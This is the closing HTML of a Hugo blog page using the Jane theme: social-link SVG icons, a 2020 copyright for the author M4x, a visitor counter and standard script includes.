  <path d="M664.781909 681.472759 0 97.881301C0 3.997201 71.046997 0 71.046997 0L474.477909 0 961.649408 0 1361.641813 0C1361.641813 0 1432.688811 3.997201 1432.688811 97.881301L771.345323 681.472759C771.345323 681.472759 764.482731 685.154773 753.594283 688.65053L753.594283 688.664858C741.602731 693.493018 729.424896 695.068979 718.077952 694.839748 706.731093 695.068979 694.553173 693.493018 682.561621 688.664858L682.561621 688.65053C671.644501 685.140446 664.781909 681.472759 664.781909 681.472759L664.781909 681.472759ZM718.063616 811.603883C693.779541 811.016482 658.879232 802.205449 619.10784 767.734955 542.989056 701.759633 0 212.052267 0 212.052267L0 942.809523C0 942.809523 0 1024 83.726336 1024L682.532949 1024 753.579947 1024 1348.948139 1024C1432.688811 1024 1432.688811 942.809523 1432.688811 942.809523L1432.688811 212.052267C1432.688811 212.052267 893.138176 701.759633 817.019477 767.734955 777.248 802.205449 742.347691 811.03081 718.063616 811.603883L718.063616 811.603883Z"></path>
</svg>

    </a>
  
    <a href="https://twitter.com/M4x_1997" rel="me noopener" class="iconfont"
      title="twitter"  target="_blank"
      >
      <svg class="icon" viewBox="0 0 1264 1024" version="1.1"
  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
  width="36" height="36">
  <path d="M1229.8616 18.043658c0 0-117.852626 63.135335-164.151872 67.344358-105.225559-164.151872-505.082682-92.598492-437.738325 223.078185C278.622548 312.675223 89.216542 47.506814 89.216542 47.506814s-117.852626 189.406006 75.762402 345.139833C127.097743 396.85567 55.544363 371.601535 55.544363 371.601535S26.081207 535.753407 253.368414 615.724832c-21.045112 29.463156-113.643603 8.418045-113.643603 8.418045s25.254134 143.10676 231.496229 180.987961c-143.10676 130.479693-387.230056 92.598492-370.393967 105.225559 206.242095 189.406006 1119.599946 231.496229 1128.01799-643.98042C1179.353331 249.539887 1263.533778 123.269217 1263.533778 123.269217s-130.479693 37.881201-138.897738 33.672179C1225.652577 98.015083 1229.8616 18.043658 1229.8616 18.043658"></path>
</svg>

    </a>
  
    <a href="https://github.com/bash-c" rel="me noopener" class="iconfont"
      title="github"  target="_blank"
      >
      <svg class="icon" style="" viewBox="0 0 1024 1024" version="1.1"
  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
  width="36" height="36">
  <path d="M512 12.672c-282.88 0-512 229.248-512 512 0 226.261333 146.688 418.133333 350.08 485.76 25.6 4.821333 34.986667-11.008 34.986667-24.618667 0-12.16-0.426667-44.373333-0.64-87.04-142.421333 30.890667-172.458667-68.693333-172.458667-68.693333C188.672 770.986667 155.008 755.2 155.008 755.2c-46.378667-31.744 3.584-31.104 3.584-31.104 51.413333 3.584 78.421333 52.736 78.421333 52.736 45.653333 78.293333 119.850667 55.68 149.12 42.581333 4.608-33.109333 17.792-55.68 32.426667-68.48-113.706667-12.8-233.216-56.832-233.216-253.013333 0-55.893333 19.84-101.546667 52.693333-137.386667-5.76-12.928-23.04-64.981333 4.48-135.509333 0 0 42.88-13.738667 140.8 52.48 40.96-11.392 84.48-17.024 128-17.28 43.52 0.256 87.04 5.888 128 17.28 97.28-66.218667 140.16-52.48 140.16-52.48 27.52 70.528 10.24 122.581333 5.12 135.509333 32.64 35.84 52.48 81.493333 52.48 137.386667 0 196.693333-119.68 240-233.6 252.586667 17.92 15.36 34.56 46.762667 34.56 94.72 0 68.522667-0.64 123.562667-0.64 140.202666 0 13.44 8.96 29.44 35.2 24.32C877.44 942.592 1024 750.592 1024 524.672c0-282.752-229.248-512-512-512"></path>
</svg>

    </a>


<a href="https://bash-c.github.io/index.xml" rel="noopener alternate" type="application/rss&#43;xml"
    class="iconfont" title="rss" target="_blank">
    <svg class="icon" viewBox="0 0 1024 1024" version="1.1"
  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
  width="30" height="30">
  <path d="M819.157333 1024C819.157333 574.592 449.408 204.8 0 204.8V0c561.706667 0 1024 462.293333 1024 1024h-204.842667zM140.416 743.04a140.8 140.8 0 0 1 140.501333 140.586667A140.928 140.928 0 0 1 140.074667 1024C62.72 1024 0 961.109333 0 883.626667s62.933333-140.544 140.416-140.586667zM678.784 1024h-199.04c0-263.210667-216.533333-479.786667-479.744-479.786667V345.173333c372.352 0 678.784 306.517333 678.784 678.826667z"></path>
</svg>

  </a>
   
</div>

<div class="copyright">
  <span class="power-by">
    Powered by <a class="hexo-link" href="https://gohugo.io">Hugo</a>
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    Theme - <a class="theme-link" href="https://github.com/xianmin/hugo-theme-jane">Jane</a>
  </span>

  <span class="copyright-year">
    &copy;
    
       -
    2020
    <span class="heart">
      
      <i class="iconfont">
        <svg class="icon" viewBox="0 0 1025 1024" version="1.1"
  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
  width="14" height="14">
  <path d="M1000.1 247.9c-15.5-37.3-37.6-70.6-65.7-98.9-54.4-54.8-125.8-85-201-85-85.7 0-166 39-221.4 107.4C456.6 103 376.3 64 290.6 64c-75.1 0-146.5 30.4-201.1 85.6-28.2 28.5-50.4 61.9-65.8 99.3-16 38.8-24 79.9-23.6 122.2 0.7 91.7 40.1 177.2 108.1 234.8 3.1 2.6 6 5.1 8.9 7.8 14.9 13.4 58 52.8 112.6 102.7 93.5 85.5 209.9 191.9 257.5 234.2 7 6.1 15.8 9.5 24.9 9.5 9.2 0 18.1-3.4 24.9-9.5 34.5-30.7 105.8-95.9 181.4-165 74.2-67.8 150.9-138 195.8-178.2 69.5-57.9 109.6-144.4 109.9-237.3 0.1-42.5-8-83.6-24-122.2z"
   fill="#8a8a8a"></path>
</svg>

      </i>
    </span><span class="author">
        M4x
        
      </span></span>

  
  
    <span id="busuanzi_container">
      访客数/访问量：<span id="busuanzi_value_site_uv"></span>/<span id="busuanzi_value_site_pv"></span>
    </span>
  

  
</div>

    </footer>

    <div class="back-to-top" id="back-to-top">
      <i class="iconfont">
        
        <svg class="icon" viewBox="0 0 1024 1024" version="1.1"
  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
  width="35" height="35">
  <path d="M510.866688 227.694839 95.449397 629.218702l235.761562 0-2.057869 328.796468 362.40389 0L691.55698 628.188232l241.942331-3.089361L510.866688 227.694839zM63.840492 63.962777l894.052392 0 0 131.813095L63.840492 195.775872 63.840492 63.962777 63.840492 63.962777zM63.840492 63.962777"></path>
</svg>

      </i>
    </div>
  </div>
  
<script type="text/javascript" src="/lib/jquery/jquery-3.2.1.min.js"></script>
  <script type="text/javascript" src="/lib/slideout/slideout-1.0.1.min.js"></script>




<script type="text/javascript" src="/js/main.638251f4230630f0335d8c6748e53a96f94b72670920b60c09a56fdc8bece214.js" integrity="sha256-Y4JR9CMGMPAzXYxnSOU6lvlLcmcJILYMCaVv3Ivs4hQ=" crossorigin="anonymous"></script>






  
    <script type="text/javascript" src="/js/load-photoswipe.js"></script>
    <script type="text/javascript" src="/lib/photoswipe/photoswipe.min.js"></script>
    <script type="text/javascript" src="/lib/photoswipe/photoswipe-ui-default.min.js"></script>
  




  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>










</body>
</html>
